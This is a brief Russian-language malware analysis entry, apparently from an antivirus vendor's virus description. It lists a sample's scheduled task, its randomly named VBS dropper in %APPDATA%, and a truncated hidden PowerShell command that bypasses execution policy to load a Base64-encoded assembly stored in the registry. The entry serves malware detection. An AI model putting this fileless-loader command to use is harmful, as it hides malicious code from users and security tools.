Техническая информация
- <SYSTEM32>\tasks\ywzdpxqniprtkpw
- %APPDATA%\ywzdpxqniprtkpw.vbs
- '<SYSTEM32>\wscript.exe' "%APPDATA%\ywZDPXqnIpRtkPw.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ywZDPXqnIpRtkPw' -... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {E858DC28-7352-4F18-8B3F-FF029AB01E5D} S-1-5-21-3691498038-2086406363-2140527554-1000:nntbumvgnu\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%APPDATA%\ywZDPXqnIpRtkPw.vbs" (со скрытым окном)